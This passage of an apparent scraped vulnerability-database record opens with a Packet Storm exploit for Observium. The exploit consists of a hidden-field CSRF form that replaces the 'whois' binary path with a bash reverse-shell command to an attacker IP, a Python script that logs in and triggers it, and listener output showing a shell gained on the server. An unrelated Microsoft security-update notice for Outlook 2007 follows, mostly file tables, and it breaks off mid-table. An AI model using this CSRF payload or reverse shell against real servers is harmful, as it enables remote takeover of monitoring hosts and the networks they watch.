\n \nand a CSRF which looks like this: \n \n<!-- \n<html> \n<div align=\"center\"> \n<pre> \n \n<h2><b>CSRF<b></h2> \n<body> \n<form \naction=\"http://<observiumIP>/settings/section=paths/\" \nmethod=\"POST\"> \n<input type=\"hidden\" name=\"temp_dir\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_temp_dir\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_rrdtool\" value=\"\" /> \n<input type=\"hidden\" name=\"fping\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_fping\" value=\"\" /> \n<input type=\"hidden\" name=\"fping6\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_fping6\" value=\"\" /> \n<input type=\"hidden\" name=\"svn\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_svn\" value=\"\" /> \n<input type=\"hidden\" name=\"snmpget\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_snmpget\" value=\"\" /> \n<input type=\"hidden\" name=\"snmpwalk\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_snmpwalk\" value=\"\" /> \n<input type=\"hidden\" name=\"snmpbulkget\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_snmpbulkget\" value=\"\" /> \n<input type=\"hidden\" name=\"snmpbulkwalk\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_snmpbulkwalk\" value=\"\" /> \n<input type=\"hidden\" name=\"snmptranslate\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_snmptranslate\" value=\"\" /> \n<input type=\"hidden\" name=\"ipmitool\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_ipmitool\" value=\"\" /> \n<input type=\"hidden\" name=\"virsh\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_virsh\" value=\"\" /> \n<input type=\"hidden\" name=\"wmic\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_wmic\" value=\"\" /> \n<input type=\"hidden\" name=\"git\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_git\" value=\"\" /> \n<input type=\"hidden\" name=\"whois\" value=\"bash -i >& /dev/tcp/192.168.2.222/4444 0>&1; exit\" /> \n<input type=\"hidden\" name=\"varset_whois\" value=\"\" /> \n<input 
type=\"hidden\" name=\"whois_custom\" value=\"1\" /> \n<input type=\"hidden\" name=\"file\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_file\" value=\"\" /> \n<input type=\"hidden\" name=\"dot\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_dot\" value=\"\" /> \n<input type=\"submit\" name=\"submit\" value=\"save\" /> \n</form> \n</body> \n</div> \n</html> \n \nor by changing the field of Path to 'whois' binary to 'bash -i >& /dev/tcp/attackerip/4444 0>&1; exit' and then visiting http://observium-server/netcmd.php?cmd=whois&query=8.8.8.8, we trigger the code that is defined in the \nwhois parameter which gives us a reverse shell on the machine: \n \nyou may also use the following python instead: \n \n\"\"\" \nimport sys \nimport urllib \nimport urllib2 \nimport cookielib \n \n#!/usr/bin/python \nusername = 'test' \npassword = '123456' \ntimeout = 10 \n \ntry: \ncj = cookielib.CookieJar() \nopener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) \nlogin_data = urllib.urlencode({'username' : username, 'password' : password, 'submit' : ''}) \nopener.open('http://observium-server', login_data, timeout=timeout) \nurl = 'http://observium-server/netcmd.php?cmd=whois&query=8.8.8.8' \nresp = opener.open(url) \n \nexcept Exception, e: \nprint e \nsys.exit(1) \n\"\"\" \n \nlistening on [any] 4444 ... \n192.168.2.155: inverse host lookup failed: Unknown host \nconnect to [192.168.2.222] from (UNKNOWN) [192.168.2.155] 52413 \nbash: no job control in this shell \nbash: /root/.bashrc: Permission denied \nbash-4.1$ ls -l /opt \nls -l /opt \ntotal 48944 \ndrwxrwxr-x 12 1000 1000 4096 Apr 27 13:47 observium \n-rw-r--r-- 1 root root 50107191 Jan 27 07:35 observium-community-latest.tar.gz \ndrwxr-xr-x. 
2 root root 4096 Mar 26 2015 rh \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/136859/observium0167533-execxsrf.txt"}], "mskb": [{"lastseen": "2021-01-01T22:44:42", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-0852", "CVE-2018-0850"], "description": "<html><body><p>Description of the security update for Outlook 2007: February 13, 2018.</p><h2>Summary</h2><p>This security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see <a data-content-id=\"\" data-content-type=\"\" href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-0850\" managed-link=\"\" target=\"\">Microsoft Common Vulnerabilities and Exposures CVE-2018-0850</a> and\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-0852\" managed-link=\"\" target=\"\">CVE-2018-0852</a>.<br/><br/><strong>Note</strong> To apply this security update, you must have the release version of <a href=\"https://support.microsoft.com/kb/949585\">Service Pack 3 for the 2007 Microsoft Office suite</a> installed on the computer.</p><h2>How to get and install the update</h2><h3>Method 1: Microsoft Update</h3><p>This update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. 
For more information about how to get security updates automatically, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"\">Windows Update: FAQ</a>.</p><h3>Method 2: Microsoft Update Catalog</h3><p>To get the stand-alone package for this update, go to the <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4011200\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a> website.</p><h3>Method 3: Microsoft Download Center</h3><p>You can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.</p><ul linespacing=\"1\" style=\"list-style-type:UnorderedBullets\" type=\"UnorderedBullets\"><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a bookmark-id=\"\" data-content-id=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=734d6c5d-c1f5-4f58-a7c4-dcd8da6c33ac\" managed-link=\"\">Download the security update KB4011200 for the 32-bit version of Outlook 2007</a></li></ul><h2>More Information</h2><h3>Security update deployment information</h3><p>For deployment information about this update, see <a href=\"https://support.microsoft.com/en-us/help/20180213\">security update deployment information: February 13, 2018</a>.</p><h3>Security update replacement information</h3><p>This security update replaces previously released security update <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4011213\" managed-link=\"\" target=\"\">KB 4011213</a>.</p><h3>File hash information</h3><table class=\"table\"><tbody><tr><th>Package name</th><th>Package hash SHA 1</th><th>Package hash SHA 
2</th></tr><tr><td>outlookloc2007-kb4011200-fullfile-x86-glb.exe</td><td>8C90C9F0CF97FB052E50B011E875F05961930CDA</td><td>D3AF6A449218A166BAA392177FFBC84F5DFF02AF7AF365CDE75E3D1C85866164</td></tr></tbody></table><h3>File information</h3><p>The English version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.</p><h4>For all supported x86-based versions of Outlook 2007</h4><table class=\"table\"><tbody><tr><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th><th>Platform</th></tr><tr><td>Outlook-ar-sa.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-bg-bg.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:07</td><td>Not applicable</td></tr><tr><td>Outlook-ca-es.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-cs-cz.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:07</td><td>Not applicable</td></tr><tr><td>Outlook-da-dk.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-de-de.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:07</td><td>Not applicable</td></tr><tr><td>Outlook-el-gr.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:07</td><td>Not applicable</td></tr><tr><td>Outlook-en-us.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-es-es.xml</td><td>Not 
applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>11130</td><td>Not
applicable</td><td>290</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1114</td><td>Not applicable</td><td>48</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>1119</td><td>Not applicable</td><td>496</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>112</td><td>Not applicable</td><td>3,212</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>112.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1120</td><td>Not applicable</td><td>226</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1121</td><td>Not applicable</td><td>580</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1122</td><td>Not applicable</td><td>1,504</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1123</td><td>Not applicable</td><td>1,016</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1124</td><td>Not applicable</td><td>164</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1128</td><td>Not applicable</td><td>1,384</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1129</td><td>Not applicable</td><td>1,168</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>113</td><td>Not applicable</td><td>1,600</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>113.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1130</td><td>Not applicable</td><td>1,576</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1133</td><td>Not applicable</td><td>1,320</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1136</td><td>Not applicable</td><td>1,028</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>114</td><td>Not 
applicable</td><td>1,988</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>114.ico</td><td>Not applicable</td><td>3,774</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1140</td><td>Not applicable</td><td>1,184</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1142</td><td>Not applicable</td><td>56</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>115</td><td>Not applicable</td><td>3,148</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>115.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1152</td><td>Not applicable</td><td>996</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1153</td><td>Not applicable</td><td>1,970</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1156</td><td>Not applicable</td><td>1,200</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>116</td><td>Not applicable</td><td>7,680</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>116.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1160</td><td>Not applicable</td><td>404</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1163</td><td>Not applicable</td><td>356</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1164</td><td>Not applicable</td><td>1,596</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1166</td><td>Not applicable</td><td>1,416</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1168</td><td>Not applicable</td><td>736</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1169</td><td>Not applicable</td><td>314</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>117</td><td>Not 
applicable</td><td>6,144</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>117.ico</td><td>Not applicable</td><td>9,662</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1170</td><td>Not applicable</td><td>938</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1171</td><td>Not applicable</td><td>792</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1172</td><td>Not applicable</td><td>966</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1173</td><td>Not applicable</td><td>2,320</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1174</td><td>Not applicable</td><td>596</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1175</td><td>Not applicable</td><td>1,596</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1176</td><td>Not applicable</td><td>890</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1177</td><td>Not applicable</td><td>558</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1178</td><td>Not applicable</td><td>852</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1179</td><td>Not applicable</td><td>808</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>118</td><td>Not applicable</td><td>14,848</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>118.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1180</td><td>Not applicable</td><td>972</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1181</td><td>Not applicable</td><td>398</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1182</td><td>Not applicable</td><td>916</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1184</td><td>Not 
applicable</td><td>700</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1185</td><td>Not applicable</td><td>782</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1187</td><td>Not applicable</td><td>1,936</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>119</td><td>Not applicable</td><td>62</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>119.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1191</td><td>Not applicable</td><td>1,930</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1192</td><td>Not applicable</td><td>1,772</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1193</td><td>Not applicable</td><td>452</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1195</td><td>Not applicable</td><td>1,064</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1196</td><td>Not applicable</td><td>750</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1197</td><td>Not applicable</td><td>352</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1198</td><td>Not applicable</td><td>1,132</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1199</td><td>Not applicable</td><td>756</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12</td><td>Not applicable</td><td>2,096</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12.jpg</td><td>Not applicable</td><td>1,985</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>120</td><td>Not applicable</td><td>13,312</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>120.ico</td><td>Not 
applicable</td><td>894</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1200</td><td>Not applicable</td><td>1,488</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12000</td><td>Not applicable</td><td>196</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12001</td><td>Not applicable</td><td>184</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12002</td><td>Not applicable</td><td>148</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12003</td><td>Not applicable</td><td>160</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12004</td><td>Not applicable</td><td>112</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12006</td><td>Not applicable</td><td>124</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12012</td><td>Not applicable</td><td>136</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12013</td><td>Not applicable</td><td>136</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12016</td><td>Not applicable</td><td>184</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12017</td><td>Not applicable</td><td>172</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1202</td><td>Not applicable</td><td>916</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1203</td><td>Not applicable</td><td>868</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12030</td><td>Not applicable</td><td>212</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12031</td><td>Not applicable</td><td>336</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12032</td><td>Not applicable</td><td>224</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12033</td><td>Not 
applicable</td><td>304</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12034</td><td>Not applicable</td><td>324</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12035</td><td>Not applicable</td><td>314</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12036</td><td>Not applicable</td><td>338</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12037</td><td>Not applicable</td><td>224</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12039</td><td>Not applicable</td><td>194</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12040</td><td>Not applicable</td><td>304</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12041</td><td>Not applicable</td><td>304</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12042</td><td>Not applicable</td><td>548</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12043</td><td>Not applicable</td><td>302</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12044</td><td>Not applicable</td><td>72</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12045</td><td>Not applicable</td><td>152</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12046</td><td>Not applicable</td><td>304</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12047</td><td>Not applicable</td><td>204</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12048</td><td>Not applicable</td><td>214</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12049</td><td>Not applicable</td><td>204</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12050</td><td>Not applicable</td><td>274</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12051</td><td>Not 
applicable</td><td>374</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12052</td><td>Not applicable</td><td>300</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12053</td><td>Not applicable</td><td>300</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12054</td><td>Not applicable</td><td>72</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12055</td><td>Not applicable</td><td>106</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12056</td><td>Not applicable</td><td>362</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12057</td><td>Not applicable</td><td>280</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12058</td><td>Not applicable</td><td>774</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12059</td><td>Not applicable</td><td>260</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12060</td><td>Not applicable</td><td>248</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12061</td><td>Not applicable</td><td>194</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12062</td><td>Not applicable</td><td>362</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12065</td><td>Not applicable</td><td>72</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12066</td><td>Not applicable</td><td>234</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12068</td><td>Not applicable</td><td>106</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12069</td><td>Not applicable</td><td>248</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12072</td><td>Not applicable</td><td>112</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12073</td><td>Not 
applicable</td><td>108</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12074</td><td>Not applicable</td><td>98</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12075</td><td>Not applicable</td><td>118</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12076</td><td>Not applicable</td><td>218</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12077</td><td>Not applicable</td><td>72</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12078</td><td>Not applicable</td><td>362</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12079</td><td>Not applicable</td><td>248</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12080</td><td>Not applicable</td><td>362</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12086</td><td>Not applicable</td><td>132</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12087</td><td>Not applicable</td><td>72</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12089</td><td>Not applicable</td><td>92</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12090</td><td>Not applicable</td><td>204</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12091</td><td>Not applicable</td><td>158</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12092</td><td>Not applicable</td><td>132</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12093</td><td>Not applicable</td><td>138</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12094</td><td>Not applicable</td><td>72</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12095</td><td>Not applicable</td><td>132</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12096</td><td>Not 
applicable</td><td>106</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12097</td><td>Not applicable</td><td>568</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12098</td><td>Not applicable</td><td>158</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12099</td><td>Not applicable</td><td>374</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>121</td><td>Not applicable</td><td>13,312</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>121.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12100</td><td>Not applicable</td><td>386</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12101</td><td>Not applicable</td><td>196</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12102</td><td>Not applicable</td><td>544</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12103</td><td>Not applicable</td><td>284</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12104</td><td>Not applicable</td><td>154</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12106</td><td>Not applicable</td><td>268</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12107</td><td>Not applicable</td><td>160</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12109</td><td>Not applicable</td><td>196</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12110</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12111</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12112</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12113</td><td>Not 
applicable</td><td>278</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12114</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12115</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12116</td><td>Not applicable</td><td>298</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12117</td><td>Not applicable</td><td>188</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12118</td><td>Not applicable</td><td>72</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12119</td><td>Not applicable</td><td>218</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12120</td><td>Not applicable</td><td>416</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12121</td><td>Not applicable</td><td>468</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12122</td><td>Not applicable</td><td>704</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12124</td><td>Not applicable</td><td>382</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12125</td><td>Not applicable</td><td>524</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12126</td><td>Not applicable</td><td>564</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12127</td><td>Not applicable</td><td>376</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12128</td><td>Not applicable</td><td>440</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12130</td><td>Not applicable</td><td>148</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12131</td><td>Not applicable</td><td>204</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12132</td><td>Not 
